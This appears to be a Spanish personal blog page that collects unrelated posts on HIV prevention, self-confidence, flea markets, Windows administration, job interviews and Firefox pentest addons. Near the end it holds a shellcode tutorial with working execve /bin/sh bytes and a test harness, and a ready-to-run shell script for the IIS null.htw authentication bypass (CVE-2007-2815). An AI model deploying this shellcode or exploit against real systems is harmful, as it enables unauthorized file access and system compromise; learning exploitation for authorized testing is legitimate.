Mi límite entre lo monótono y la aventura...

Banner 468

Inicio
RSS

SIDA - INFORMARTE es Cuidarte también...

El SIDA es una enfermedad infecciosa que ataca al sistema inmunológicoSIDA significa Síndrome (un conjunto de síntomas) de Inmunodeficiencia (que ataca al sistema inmulogógico) Adquirida (no es hereditaria, sino causada por un virus). Es provocado por un virus que se llama HIV o VIH (Virus de Inmunodeficiencia Humana).

El VIH se encuentra en todos los líquidos orgánicos de aquella persona que tiene el virus: sangre, semen, saliva, lágrimas, leche, calostro, orina, secreciones uterinas y vaginales y el líquido preseminal. Pero solamente la sangre, el líquido preseminal, el semen, fluidos vaginales y la leche materna presentan una concentración suficiente como para producir la transmisión.

Se llama persona que vive con VIH a la persona en la que se detecta que ha tenido contacto con el virus. Enfermo/a es la persona en la cual se han detectado enfermedades causadas por la inmunodeficiencia producida por el virus. La persona que vive con el virus no tiene síntomas.


  El sida nos hace iguales a todos!





Cómo prevenirlo
1) Usá preservativo
No importa que uses otros métodos anticonceptivos efectivos para prevenir embarazos como las pastillas, inyecciones o parches. La única manera para protegerte del VIH y otras infecciones de transmisión sexual (ITS) es usando preservativo cada vez que tengas relaciones sexuales.
El preservativo es el único método que puede protegerte del VIH/sida y otras ITS. Para que la protección sea efectiva tenés que usarlo correcta y consistentemente cada vez que tengas relaciones sexuales.


 
2) Evitá el contacto con sangre
Para evitar la transmisión del VIH por vía sanguínea es necesario no intercambiar o compartir agujas y jeringas. En el caso de que se consuman drogas de manera inyectable, usar una nueva jeringa cada vez. También se sugiere controlar que todo procedimiento que incluya algún corte o punción (pinchazo) sea realizado con material descartable o esterilizado, como es el caso del dentista, manicura, tatuajes o prácticas médicas, ente otros.



3) Controlá tu embarazo


Para evitar la transmisión del virus de la madre al bebé se recomienda que toda mujer embarazada se realice el análisis de VIH con el primer control de su embarazo. Si el resultado es positivo, la embarazada debe seguir las indicaciones médicas y aplicar las medidas de cuidado para evitar la transmisión al bebé: control y tratamiento clínico y suspensión de la lactancia materna. Así, las posibilidades de transmitir el virus al bebé son casi nulas.


4) Hacete el test de VIH


La única manera de saber si alguien contrajo el VIH es a través de una prueba de laboratorio. Muchas personas que viven con VIH se encuentran saludables y no saben que lo tienen, por eso es importante que realices la prueba. Para saber más ingresá a Análisis de VIH



 Ante el SIDA todos somos iguales!

 

Análisis de VIH
El análisis de VIH es un análisis de sangre que detecta la presencia de anticuerpos al VIH. Esta prueba se llama ELISA y dado que no es específica de la infección por VIH, su resultado debe ser confirmado con otra prueba denominada Western Blot.

El cuerpo humano produce anticuerpos para luchar contra las enfermedades. En el caso del VIH, la presencia de anticuerpos demuestra que una persona está infectada, es decir, que el virus está presente en su cuerpo y que, de no tomar las precauciones correspondientes, puede transmitirlo a otras personas. Una persona que vive con VIH puede no presentar ningún síntoma. Estar infectado, no es lo mismo que tener sida.

Por lo tanto, hacerse un análisis de VIH es importante para saber si estás infectado, y, en ese caso, tener en cuenta que podés transmitir el virus a otros. También es importante para recibir ayuda médica, pues existen tratamientos con distintas drogas para retardar el desarrollo de la enfermedad y mejorar la calidad de vida. Y, por último, para evitar la transmisión al bebé en caso de embarazo.

El análisis de VIH es confidencial, rápido, simple y gratuito en todos los hospitales públicos.

Un resultado positivo significa:
Que se encuentran anticuerpos del VIH en tu sangre. Que tenés el virus de VIH. No significa que tengas sida. Que podés infectar a otra persona si mantenés relaciones sexuales sin protección (sin preservativo) o por contacto directo de sangre con sangre. Que debés protegerte siempre en tus relaciones sexuales para no correr riesgo de re-infección. Esto significa que debés evitar que el VIH vuelva a ingresar en tu organismo, ya que eso aumenta la posibilidad de contraer sida. Que podrás continuar con tus actividades cotidianas. Que en caso de quedar embarazada y no recibir la atención médica adecuada, podés transmitir el virus a tu bebe antes de nacer, durante el parto o al darle de mamar. En caso de no recibir atención médica en el embarazo o en el momento del parto, uno de cada tres bebes que nacen de una mujer infectada puede desarrollar sida.

Un resultado negativo significa:
Que no se encontraron anticuerpos al VIH en tu sangre. Para estar seguro del resultado de tu análisis debés esperar 2 meses después de la situación en la que pudiste haberte infectado. Siempre se recomienda hacer dos análisis para mayor seguridad en el caso del negativo.

Cualquiera sea su resultado
No tengas relaciones sexuales sin preservativos.
Protegerse significa evitar que sangre, líquido preseminal, semen o fluido vaginal ingresen a tu cuerpo. Protegerse también significa no dejar que tu líquido preseminal, semen, sangre o fluido vaginal, ingresen en el cuerpo de otra persona. No dones sangre si pudiste haber estado en contacto con el VIH.
Si consumís drogas, no compartas jeringas ni agujas.





 

Fuente y más información en Argentina: 

[ Leer más ]

Ganar confianza en uno mismo...

1. Viaja al futuro (esto ha de ser mentalmente.. ya que se han agotado los concentradores de fluzo...) y, desde allí, pregúntate si a lo que te enfrentas es algo tan importante como ahora te parece. Este ejercicio puede ser un poco morboso, pero funciona a la perfección. Imagínate a ti mismo en tu lecho de muerte, haciendo recuento de lo que ha sido tu vida. Te rodean tu familia y amigos (Y puede que hasta la mujer/hombre de tu vida). Estás revisando los momentos mas significativos de tu existencia. ¿Realmente crees que a lo que ahora haces frente va a aparecer en ese repaso? Eso es altamente improbable. Viendo las cosas con la perspectiva adecuada nos damos cuenta de la importancia que realmente tienen. Al ponerlas en su sitio, el miedo -el respeto- que nos da, desaparece.

2. Si estás asustado porque vas a hacer algo por primera vez… sencillo ! imagina que ya lo has hecho en el pasado! (si.. esto tb es mentalmente!!!) Cierra tus ojos, e imagínate entonces a ti mismo (mas joven, mas majo..), y de la forma mas realista posible (pon tus cinco sentidos en ello), culminando con éxito lo que ahora vas a hacer por primera vez. La mente realmente no sabe diferenciar entre algo imaginado con mucho detalle, de algo real. Lo confunde. Habrás superado el miedo a la primera vez.

3. Ante el primer síntoma de desconfianza, pregúntate a ti mismo, “¿Qué es lo peor que me podría pasar?”. Muy a menudo otorgamos excesiva importancia a los potenciales problemas que pueden surgir si intentamos algo. ¿Porqué no usar toda nuestra energía en lograr nuestras metas, en lugar de gastarlas preocupándonos de lo que podría ocurrir? Actúa sin miedo ! Minimiza riesgos, vale, pero que el miedo no te detenga.

4. Anula a la molesta y negativa vocecilla interna que te dicta como actuar. Ese pepito grillo puede detener a cualquiera. Para desarmarlo imagina el mando a distancia de tu tele… y simplemente baja el sonido a 0… pulsa el mute. O… ¿porque no tratas de cambiar esa voz por la de ummm.. La duquesa de la Calzada (del programa Anda ya)? ¿De verdad, podrías imaginarte seriamente a la Duquesa de la Calzada diciéndote lo que tienes que hacer y criticándote?. El truco para desmontarla es alterar la forma en la que te afecta. Si es tu propia voz la que te insta a detenerte, lo consigue. Si es una voz chistosa, te hará reír y continuarás adelante.

5. Piensa en el “como sería si…”. Este truco es realmente bueno. Ante una situación concreta, ¿Si tuvieras confianza, como actuarías? ¿como te moverías? ¿como hablarías? ¿en que pensarías? ¿que cosas te dirías a ti mismo? Preguntándote estas cuestiones, estas, literalmente, forzándote a imaginarte en un estado de confianza… ya lo único que tienes que hacer es “actuar” en función a las respuestas que des. Poco a poco irás olvidando que estás actuando, y se convertirá en un hábito automático.

6. Encuentra a alguien que ya demuestra confianza en ese área, e imítalo. Toma como modelo su comportamiento, su actitud, sus valores, sus creencias… y aplícalo, de la forma que puedas, en el contexto que tú necesitas. ¿Cómo hacer esto? Si tienes la posibilidad habla con él, y si no, pues trata de acercarte, y de observarlo lo más que puedas. Aprende de él.

7. Recuerda: pierdes el 100% de las oportunidades que no intentas. Para conseguir lo que quieres, debes actuar. A veces lo que nos inmoviliza es el pensar que vamos a molestar… que estamos en un entorno hostil. Por ejemplo, necesitamos preguntar por algo, pero preferimos no hacerlo y dejarlo pasar. Cambia el chip. Debes creer que la gente realmente está ansiosa por ayudarte. Puede que esto no sea del todo cierto en el Mundo Real… pero tener esta mentalidad es algo muy útil. Si no lo consigues a la primera, pregunta a cuantas personas sean necesarias para obtener lo que buscas. Al final casi siempre lo conseguirás. De hecho la mayoría de la gente está encantada en poder ayudar a otros. Extrapólalo a otros ámbitos: cree ciegamente que te mueves en un entorno amistoso.



[ Leer más ]

Diez mercados imprescindibles

Diez mercados imprescindibles

Si te gusta ir al Rastro de Madrid (www.elrastro.org) o Els Encants Vells de Barcelona (www.encantsbcn.com) no te puedes perder estos mercados cuando visites estas otras ciudades europeas.

  1. 1.París
    En la capital francesa hay muchos mercadillos pero ninguno comparable al gigantesco Marché des Puces (Mercado de las Pulgas) de Saint-Ouen en la Porte de Clignancourt que tiene lugar todos los sábados, domingos y lunes del año.
  2. 2.Londres
    Hay tantos que cada uno va a encontrar su favorito. Los nuestros son el de Portobello Road que se celebra los sábados y donde puede aparecer en cualquier momento un personaje como el que interpretaba Julia Roberts en Notting Hill y el de Camden Lock, rodeado de otros y abierto todos los días de la semana.
  3. 2.Roma
    Hay pocas cosas mejores que hacer un domingo por la mañana en 'la ciudad eterna' que visitar el mercado de Porta Portese que se extiende a lo largo de la via Portuense hasta el viale Trastevere.
  4. 4.Bruselas
    Auque hay actividad cada día entre las seis de la mañana y las dos de la tarde, el Marché des Puces de la Place du Jeu de Balle se hace mucho más grande el domingo y da la oportunidad de descubrir el castizo barrio de Marolles.
  5. 5.Berlín
    Hay al menos media docena de mercados interesantes en la capital de Alemania pero nuestros favoritos son el Flohmarkt, en Mauerpark, que tiene lugar los domingos y el de Boxhagener Platz, que aunque también se celebra los sábados, es el domingo cuando está más animando.
  6. 6.Lisboa
    Todos los martes y sábados tiene lugar en el Campo de Santa Clara, cerca de la parroquia de San Vicente de Fora, A Feira da Ladra (el mercado de los ladrones) cuyos orígenes se remontan al S.XIII y que sigue siendo una experiencia inolvidable en todo viaje a la capital portuguesa.
  7. 7.Ámsterdam
    A Waterlooplein hace siglos que se la conoce por sus mercadillos e incluso después de la construcción del nuevo ayuntamiento sigue acogiendo más de 300 puestos todos los días excepto domingos. Tampoco hay que perderse el gigantesco mercado al aire libre de la calle Albert Cuypmarkt especializado en alimentación pero con más de una sorpresa.
  8. 8.Glasgow
    La gran metrópolis escocesa cuenta con uno de los mercados cubiertos más singulares del continente. En The Barras se puede encontrar absolutamente de todo. Además ha servido como escenario de más de una película como La Muerte en directo, protagonizada por Romy Schneider.
  9. 9.Varsovia
    Los profesionales prefieren el mercado de Bronisze, pero si no se cuenta con un coche y sólo apetece 'enredar' el mejoror sitio es Bazar na Kole que se encuentra entre las calles Obozowa y Ciołka Dzielnica Koło en el barrio de Wola y se alcanza en el tranvía nº24.
  10. 10.Atenas
    El «Pazari» o rastro de Monastiraki es el lugar al que todos los domingos por la mañana acuden los atenienses dispuestos a comprar o vender algo. Ocupa la plaza Abisinías y las plazuelas y calles adyacentes (Adrianú, Pandrosu, Ifestu, Thisíu, Ayíu Filipu, Ástiggos y Ermú). Imprescindible para conocer el alma de la ciudad.
  11.  
Vía: Elmundo.es
[ Leer más ]

Para evitar que el S.O. levante antes que haya levantado la placa de Red, por el tema de los "logon scripts"

Editar la Policy:
 
Computer Configuration \ Administrative Templates \ System \ Logon \ Always
wait for the network at computer startup and logon (ENABLED)

[ Leer más ]

Admintools 2008

Las Herramientas de administración remota del servidor para Windows® 7 con SP1 permiten a los administradores de TI administrar funciones y características instaladas en equipos que ejecutan Windows Server® 2008 R2, Windows Server® 2008 o Windows Server® 2003 desde un equipo remoto que ejecuta Windows 7 o Windows 7 con SP1.


Link descarga
[ Leer más ]

Filtrar Direcciones MAC en el DHCP de Windows Server 2003

Hasta hoy no me había surgido la necesidad de implementar una solución que requiriese filtrado MAC mediante DHCP en win 2003/2008.  Windows 2008 R2 ya incluye esta solución, en cambio para 2003 y 2008, hay que hace lo que describe el siguiente artículo.

El servicio DHCP en Windows 2003 Server no tiene la posibilidad en primera instancia de realizar un filtrado por direcciones MAC, es decir, no se le puede especificar que clientes pueden o no adquirir una dirección IP dentro de la LAN.

En el servicio se puede crear una reserva, que ofrece la posibilidad de asignar la misma dirección IP a una dirección MAC determinada, pero esto no ofrece un nivel de seguridad que garantice que clientes que no pertenecen a la organización se conecten a la red y puedan hacer uso de algún servicio que no esté restringido.

Para esto se puede utilizar un complemento que se llama DHCP Server Callout DLL, liberado por el Equipo de Desarrollo DHCP de Microsoft especialmente para Win 2008 Server, pero se puede utilizar en un Win 2003.

Les dejo el enlace para descargar el archivo comprimido que contiene el paquete instalador .MSI para arquitecturas x64 y x86

Despues de instalar el complemento (no es necesario reiniciar el S.O), el archivo de la documentación: SetupDHCPMacFilter.rtf, queda ubicado en la carpeta %SystemRoot%\system32, normalmente es C:\WINDOWS\system32, en servidores x86.

Luego, en el directorio donde se ubican las opciones del DHCP ( C:\WINDOWS\system32\dhcp), aparecen tres nuevos archivos producto de la instalación:


El archivo MACList.txt es en el cual se colocan las direcciones MAC y según el parámetro MAC_ACTION, se permite o se niega una Dirección IP para estos clientes, cabe anotar que solo se permite una acción en el archivo, o todas las MAC reciben una IP o a todas se les niega, no se permiten las dos opciones al mismo tiempo.
Un ejemplo de la estructura de este archivo es la siguiente:



Cuando se añade una nueva dirección MAC se debe reiniciar el servicio DHCP.
En el visor de sucesos de Windows, debe quedar un evento especificando que una librería de tipo callout fue cargada con éxito, de esta manera, nos damos cuenta que el filtrado se está cumpliendo.



Link: Aquí
[ Leer más ]

Las 5 aplicaciones indispensables en tu android y como activar la búsque...

[ Leer más ]

Armar conexión VPN en windows 7 starter

Set up a remote connection to your workplace using VPN

From another location, you can connect to a workplace network or another network by using a virtual private network (VPN) connection. Ask your network administrator for the name of the VPN server before you open the wizard.
  • Open the Connect to a Workplace wizard by clicking the Start button Picture of the Start button, and then clicking Control Panel. In the search box, type network, click Network and Sharing Center, click Set up a connection or network, and then click Connect to a workplace.
[ Leer más ]

Marketing Personal

Hace poco dí con este nuevo tipo de técnica denominada "Marketing personal", la cual trata de que uno se venda/muestre con casi las mismas técnicas que las del Marketing normal por así decirlo a groso modo.
Quizás esta técnica tenga ya su buen tiempo, pero no todos la conocen o mejor aún, saben hacer uso de la misma.

El Marketing personal debería de ser la herramienta que "Nos diferencie de los demás".  Con esta resumida frase comienzo el verdadero post.



Diferenciate!


La entrevista es la herramienta mediante la cual las empresas reclutan "personas" y logran separar el talento de lo que llaman "montón".  Esta situación en la que ocupamos el banquillo de "candidato", es el mejor y único momento para sobresalir, ya que nos permite vendernos y diferenciarnos de aquellos otros candidatos que buscan el mismo puesto.

Recalco mucho la idea de "diferenciarnos", ya que es eso lo que va a posibilitar poder seguir o ser rechazados.  Las maneras de lograr diferenciarnos son muchas y parten desde la base de la respuesta a la siguiente pregunta "En que soy lo mejor, o me distingo del resto?".  Esta punta, debería de ser el hilo conductor que nos lleve a armar un plan o estratégia para sobresalir por sobre otros.

"...Si todos hacemos lo mismo, somos todos iguales..."


Con la entrevista no solo se chequea el contenido del CV.  También evalúa nuestra presencia, habilidades de comunicación y personalidad.

Si hemos recibido un llamado por entrevista, primer gran paso! Ya nos hemos diferenciado de unos cuantos, y vamos camino a lo que podría ser nuestro futuro trabajo.  

Como prepararse para una entrevista? 
Ir preparados, ya es otra forma de destacarse.  Uno va con más seguridad y se perfila con otra actitud aún cuando los nervios nos acompañan. 
De que maneras puede uno preparse? Veamos algunos casos comentados en cientos de artículos que hay por la red:

  • Investiga bien sobre la empresa y el sector para el que postulas.
  • Busca en internet a tu entrevistador a fin de ver con quien te estas por reunir y de paso recopilar datos para posibles conversaciones y así lograr mayor empatía. Al mismo tiempo reduce el stress de saber con quien nos vamos a encontrar.
  • Revisa tu  currículum. Mirá que puntos se adecuan a la búsqueda y cuales no.
  • Repasa las fechas.
  • Armate un speech o visualiza como sería la entrevista y que responderías a las típicas preguntas.
  • Practica ser concreto y utilizar ejemplos para las preguntas que te puedan hacer.
  • Ensayar con alguien o bien solo y frente al espejo. Esto permite pulir asperezas y ser más precisos.
  • Ensayar 3 debilidades, 3 fortalezas  y sus respectivas explicaciones/ejemplos
  • Repasar una situación laboral difícil y como la enfrentamos y resolvimos.
  • Repasar nuestros mayores Logros y como fue su desarrollo.
  • Pensar respuesta a la pregunta de "Como se ve Ud. de aquí a 5 años?"
  • Ir mentalizados con lo que queremos a futuro.
  • Saber hasta donde vamos a negociar.

Antes de Concurrir a la Entrevista:

  • Ver que tenemos una copia del CV con nosotros. (Llevarla de forma prolija) 
  • Ir vestidos acorde al lugar u ocasión.  "Una imagen vale más que mil palabras", y créanme no todos lo entienden.
  • Llevar los datos Dirección, teléfono y nombre del Entrevistador anotados en un papel, a fin de tenerlo a mamo, dentro de un bolsillo.  Los medios electrónicos pueden fallar.
  • Ubicar el lugar físico donde se realizará la misma. Ver que medios de transporte nos llevan hasta el lugar.  
  • Si vamos en coche, prever de encontrar una cochera ya que puede ocurrir que no tengamos donde dejar el vehículo.
  • Calcular el tiempo de viaje desde donde vayamos a estar hasta el lugar de la cita.
  • Si llegamos mucho antes, recorrer la cuadra y ver el edificio donde nos esperan a fin de ver si el acceso es sencillo o hay que presentarse en seguridad y dejar todos nuestros datos, lo que nos haría perder unos 5 minutos o más según como marche de rápido el asunto.
  • Si vemos que estamos demorados, no aguardar hasta la hora de la cita para dar aviso de esto. Conviene llamar a nuestro entrevistador unos 15 o 20 minutos antes y decir que estamos demorados pero en viaje.  Con esto demostramos que somos previsores y al mismo tiempo evitamos "en parte", dar la mala impresión de llegar tarde.


Llego la entrevista, y ahora?

Según mi experiencia más lo que fui leyendo, podría decir que los siguientes tips "ayudan" llegado el momento.


  • Sé puntual. 
  • Intenta llegar 10 minutos antes.  Esto te permite emprolijar tu presencia, y evitar cualquier situación inesperada de último minuto.
  • Llevar copia del currículum. Ofrecer el mismo en el momento de comenzar la entrevista.
  • Dar la mano de manera firme y segura.
  • Mostrar interés y entusiasmo pero sin exagerar.
  • Utiliza un tono de voz seguro y lo suficientemente alto y claro para que se nos escuche y comprenda bien.
  • Estar con postura cómoda pero formal. 
  • NO INTERRUMPIR. Siempre aguardar que el entrevistador termine de hablar y nos de pie a responder.  No mostrarnos ansiosos, por más que sepamos que con la respuesta nos vamos a comprar el puesto.
  • Sonreír cuando sea apropiado, muéstrate gentil, atento y espontáneo.
  • Hacer preguntas a fin de denotar interés.
  • Guardar preguntas para el final de la entrevista. 
  • Preguntar como continúa el proceso de selección.
  • Una vez que se esta dando por cerrada la entrevista, te quedan 3 minutos para diferenciarte del resto.  Pensá que podes decir para hacerte notar o terminar de convencer que no busquen más, que vos SOS EL CANDIDATO.



PREGUNTAS FRECUENTES
En internet hay cientos de "preguntas" que dicen de hacer en todas las entrevistas.  El caso es que solo alguna de ellas aplican, ya que si no sería demasiada extensa la cita.


  • Sonreír cuando sea apropiado, muéstrate gentil, atento y espontáneo.
  • Hacer preguntas a fin de denotar interés.
  • Guardar preguntas para el final de la entrevista.
  • ¿Por qué te interesa esta empresa? ¿Por qué te interesa el puesto/posición?
  • ¿Estuviste viendo información de la Empresa?
  • Decime 1 fortaleza y 1 debilidad tuya. Amplia cada una por favor.
  • Hablame de vos. ¿cómo te describirías
  • Descríbeme una situación difícil de tu trabajo actual o anterior y cómo la resolviste.
  • Contame de algún Logro que hayas tenido.
  • Hablame acerca de alguna dificultad con algún jefe y como lo resolviste. (Ojo con esta!)
  • ¿Cómo te ves de acá a 5 años?
  • ¿Por qué deberíamos de escogerte a vos en lugar de otro candidato? (La pregunta que puede hacer que el puesto SEA TUYO! Pero no suele aparecer muy a menudo.
  • (Si estamos trabajando) ¿Por qué estas en búsqueda de otro trabajo?
  • (Si no tenemos trabajo) ¿Por qué dejaste tu último trabajo?
  • ¿Cómo sería tu trabajo ideal? 
  • ¿Cómo te imaginas a tu jefe ideal?

Ojo con el humor! Es una buena herramienta pero hay que "saber" usarla, ya que nos puede jugar en contra.  Este junto a los nervios del momento, pueden dejarnos en una situación no esperada y arruinar todo el proceso.

Voy a dar un simple pantallazo de algo que muy pocos saben y que Uds. pueden profundizar navegando por internet o recurriendo a otro tipo de material.  
Nuestro entrevistador tiene bajo su manga muchísimas herramientas y metodologías para sacarnos de verdad a mentira.  No por nada Administración de RRHH es una carrera que demanda sus buenos años de estudio.  
Entre las metodologías de entrevista, existe lo que es el formato de Entrevista.  Estas metodologías que mostraré a continuación, permiten al entrevistador conducir toda la charla y sacarnos la mayor cantidad de información sin que lo notemos.

A tener en cuenta:

Durante la entrevista nos encontraremos con preguntas "abiertas" y "cerradas".  Que es esto? Simple, las preguntas abiertas son aquellas que se hacen para que uno pueda expresar libremente sus ideas. Tienen la ventaja de proporcionar riqueza de detalles y permiten que el entrevistador formule nuevas preguntas según como vayamos respondiendo.
Este tipo de preguntas a su vez, nos permite responder con espontaneidad, pero lo que en realidad ocurre, es que estan evaluando nuestro vocabulario.


Las preguntas cerradas, son aquellas en las cuales nuestra respuesta es más concreta y limitada. Ejemplo "SI, NO, De Acuerdo, en Desacuerdo".  Este tipo de respuestas concretas permiten al entrevistador tener el control y le ahorran tiempo. Su desventaja es que no nos permiten expresarnos y la información termina no siendo tan rica en detalles.

Hay 3 tipos de entrevistas:
  • Piramidal
  • Reloj de Arena
  • Rombo
  • Embudo

Piramidal: comienza con preguntas cerradas y concluye con preguntas abiertas.
Reloj de Arena:  Comienza con preguntas abiertas, se encaminan a cerradas y finaliza con abiertas.
Rombo: Comienza con preguntas cerradas, se encamina a preguntas abiertas y finaliza con preguntas cerradas.
Embudo: Comienza con preguntas abiertas y finaliza con cerradas.

Espero que les resulte útil.
Éxitos en sus búsquedas y que logren encontrar el trabajo de sus vidas!
[ Leer más ]

Mis Addons Preferidos de Firefox

Comparto con Uds. los addons que más utilizo en Firefox.  Las descripciones las tienen dentro de cada link, así como la opción de descarga.






Addons de Seguridad iT y Pentest

Passive REcon
https://addons.mozilla.org/mn/firefox/addon/passiverecon/

FoxyProxy
http://support.microsoft.com/kb/2505743

Https Everywhere
https://www.eff.org/https-everywhere

SQL Inject Me
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

Access Me
https://addons.mozilla.org/mn/firefox/addon/access-me/

Xss Me
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

Add N Edit Cookies
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-13793/

Add & Edit Cookies +
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-92079/

Live Http Headers
https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/

Network toosl (Router Status)
http://www.brothersoft.com/router-status-216375.html

Wot

https://addons.mozilla.org/es-ES/firefox/addon/wot-safe-browsing-tool/

Active Whois
https://addons.mozilla.org/es-ES/firefox/addon/active-whois-plugin-for-firefo/

WebDeveloper
https://addons.mozilla.org/es-ES/firefox/addon/web-developer/

User Agent Switcher
https://addons.mozilla.org/mn/firefox/addon/user-agent-switcher/

HackBar
https://addons.mozilla.org/mn/firefox/addon/hackbar/

FireCookie
https://addons.mozilla.org/mn/firefox/addon/firecookie

Tamper Data
https://addons.mozilla.org/mn/firefox/addon/tamper-data/

TorButton
https://addons.mozilla.org/mn/firefox/addon/torbutton

NoScript
https://addons.mozilla.org/en-us/firefox/addon/noscript/





Utilitarios Varios - (No de seguridad)

Adblock Plus
https://addons.mozilla.org/es-ES/firefox/addon/adblock-plus/

CoolPreviews
https://addons.mozilla.org/es-ES/firefox/addon/coolpreviews/

TooManyTabs
https://addons.mozilla.org/en-us/firefox/addon/toomanytabs-saves-your-memory/

Picnik
https://addons.mozilla.org/es-ES/firefox/addon/picnik/

Pixlr Grabber
https://addons.mozilla.org/es-ES/firefox/addon/pixlr-grabber/

Image Zoom
https://addons.mozilla.org/es-ES/firefox/addon/image-zoom/

Flash Got
https://addons.mozilla.org/es-ES/firefox/addon/flashgot/

DownThemAll
https://addons.mozilla.org/es-ES/firefox/addon/downthemall/

Download Status Bar
https://addons.mozilla.org/es-ES/firefox/addon/download-statusbar/

ColorZilla
https://addons.mozilla.org/es-ES/firefox/addon/colorzilla/

Febe (Backup Firefox extensions)
https://addons.mozilla.org/mn/firefox/addon/febe/

Reminder Fox
https://addons.mozilla.org/mn/firefox/addon/reminderfox

Capture Fox
https://addons.mozilla.org/mn/firefox/addon/capture-fox/


[ Leer más ]

Que es una ShellCode?

Encontre este excelente artículo cuando investigaba sobre xss.  Muy bien explicado, lo que lo hace más que entendible para cualquiera relacionado al tema.
Las fuentes como corresponde al final del mismo...
 

Que significa shellcode?
Primero necesitamos saber el significado etimologico de shellcode.
Shell es como se le dice en ingles (ahora universal) a una terminal. Por lo tanto shellcode significa que es un codigo que nos crea una terminal para que la usemos.
Actualmente el termino shellcode no solo se refiere al codigo que nos permite crear una shell, sino que se extiende a codigos con mas funciones como pueden ser crear usuarios, matar/crear un determinado proceso, dar permisos a una carpeta, etc.

Y tecnicamente... una shellcode es una porcion de codigo compilada para un determinado procesador que se ejecuta dentro de otro proceso previamente preparado para que la ejecute (ej: stack overflow).

Como creamos una shellcode?
Generalmente se hacen en lenguaje ASM (assembler) para poder tener un control total del proceso ya que en C se agregan partes de codigo que no podemos controlar, ni hablar de otros lenguajes que ni siquiera pueden compilarse a codigo nativo del procesador (.NET, VB, Java, etc).
Ya sabemos que no tenemos muchos lenguajes para elegir jeje, asm de x86 (el procesador que usan las pcs) tiene dos sintaxis, la de Intel y la de AT&T, yo prefiero la segunda pero ya que la de Intel es mas popular usaremos esa.
Tambien necesitamos saber que una shellcode tiene que ser lo mas corta y portable posible, es por eso que usaremos llamadas al sistema y no llamaremos a la libc u otras librerias. La forma de llamar al sistema/kernel en *nix es mediante la interrupcion 0x80.
Tanta teoria se esta volviendo aburrida asi que vamos a los hechos, aca tenemos una shellcode bien simple que solamente cierra el programa llamando a exit(0).


Código
Code (asm):
BITS 32 exit: xor ebx,ebx ;ponemos 0 como argumento de exit xor eax,eax ;limpiamos eax y ebx mov al,0x01 ;ponemos 1 en eax (es el codigo de la syscall exit) int 0x80 ;finalmente llamamos a la interrupcion  
Ahi hicimos nuesta primer "shellcode".

Como extraemos los bytes u opcodes?
Lo que haremos ahora es compilarla y extraer los bytecodes que son los que nos interesan a nosotros, por eso abrimos nuestra terminal y tipeamos:
~$ nasm exit.asm
si queremos saber si se compilo bien podemos desensamblarlo (en 32 bits) con
~$ ndisasm-b 32 exit
y nos mostrara el desensamblado del codigo con sus respectivos opcodes:

00000000  31DB            xor ebx,ebx
00000002  31C0            xor eax,eax
00000004  B001              mov al,0x1
00000006  CD80              int 0x80


Para sacar estos opcodes podemos copiarlos uno por uno al exploit o a donde lo queramos poner; o sino extraerlos con alguna clase de script, yo me hice uno que pasa el archivo a la cadena de C directamente:

Código
Code (python):
#!/usr/bin/python from binascii import * import sys   files = {} length = []   def write(string): sys.stdout.write(string)   def process_file(file): source = open(file,"rb") write("char shellcode[]=\n\t\t") i = 1 l = 0 write("\"") for data in source.read(): write("\\x") write(b2a_hex(data)) if (i % 15)==0: write("\"\n\t\t\"") i+=1 l+=1 files[file[0:-4]]= l write("\";\n\n") source.close()   print("HDL Shellcode Lab - Bin to C") if(len(sys.argv)<2): exit(0) process_file(sys.argv[1])  
Como argumento le pasamos el archivo compilado anteriormente con nasm y nos devolvera algo asi que es una cadena en C para poner en nuestros exploits:


Código
Code (c):
char shellcode[]= "\x31\xdb\x31\xc0\xb0\x01\xcd\x80";  

Como probar las shellcodes?
Para probarlas podemos usar un pequeno codigo en C que salte a la shellcode directamente, aca les dejo un codigo muy simple y funcional:


Código
Code (c):
char shellcode[] = "\x31\xdb\x31\xc0\xb0\x01\xcd\x80"; //aca ponemos nuestra shellcode int main (int argc, char *argv[]) {  int (*run)();   //puntero a una funcion  run = shellcode; //asignamos la direccion de la shellcode al puntero  run();  // y la ejecutamos }  
Ahora que tenemos este codigo podemos usar cualquier debugger y poner un break en main, despues de eso ir paso por paso o sino agregamos un "int 3" al principio de la shellcode y el debugger va a saltar ahi.

Una shellcode mas compleja
Aca vamos a hacer una que nos de una shell (algo un poco mas util que salir de un programa jeje), mas especificamente una bash.


Código
Code (asm):
BITS 32        xor  eax,eax        push eax        push dword 0x68732f6e ;ponemos a /bin/sh en la pila                          push dword 0x69622f2f        mov  ebx,esp     ;y le damos la direccion de /bin/sh a ebx       xor  edx,edx        push edx ;ponemos el resto de los argumentos en la pila          push ebx        mov ecx,esp        mov al,0x0b ;llamamos a la syscall 0x0b (execve)                    int 0x80  
Y los bytecodes de esta shellcode despues de compilarla con nasm (y extraerla con el otro script) son:


Código
Code (c):
char shellcode[]= "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x31\xd2\x52\x53\x89\xe1\xb0\x0b\xcd\x80";  
Estos bytecodes ya estan para usarse y como veran no tiene ningun caracter nulo en su extension ;-) (sobre  bad chars )
Fue mas que nada para perderle miedo a los terminos raros y entender mejor como estan compuestos los exploits.

Fuente: HDLC
[ Leer más ]

Haciendo pentest sobre un Webserver di con un viejo problema el cual desconocía, con lo cual procedo a dejarme documentado en este post la info para explotar el problema.

Microsoft IIS ntlm and basic auth bypass
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

Código:


#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi

site=$1
protectedObject=$2
variabledatos=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $variabledatos



Fuente; badchecksum.net
[ Leer más ]

Bing Hacking

Lista de extensiones de archivos, soportadas para la búsqueda en BING.com
Fuente: MSDN

 

